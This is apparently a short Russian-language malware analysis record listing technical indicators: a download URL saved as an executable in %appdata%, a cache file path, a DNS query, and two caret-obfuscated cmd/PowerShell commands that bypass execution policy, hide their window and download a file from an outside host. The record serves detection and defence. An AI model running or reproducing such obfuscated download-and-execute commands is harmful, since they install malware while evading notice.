Техническая информация
- http://www.fapoergol.top/read.php?f=1.gif как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "PowER^ShEl^L.exE -^e^x^E^C^U^T^I^ONpoLIcy ^BY^pASS -NO^pR^OFIL^E -^w^in^d^oWstyLe h^IDD^eN^ (N^ew-^Ob^jecT^ s^Ys^t^E^M.n^ET.We^BclI^E^N^t).Dow^nLOAdfIle('http://www.fapoergo...
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.ie5\dyps348i\config14[1].txt
- DNS ASK fa###rgol.top
- '<SYSTEM32>\cmd.exe' /C "PowER^ShEl^L.exE -^e^x^E^C^U^T^I^ONpoLIcy ^BY^pASS -NO^pR^OFIL^E -^w^in^d^oWstyLe h^IDD^eN^ (N^ew-^Ob^jecT^ s^Ys^t^E^M.n^ET.We^BclI^E^N^t).Dow^nLOAdfIle('http://www.fapoergo... (со скрытым окном)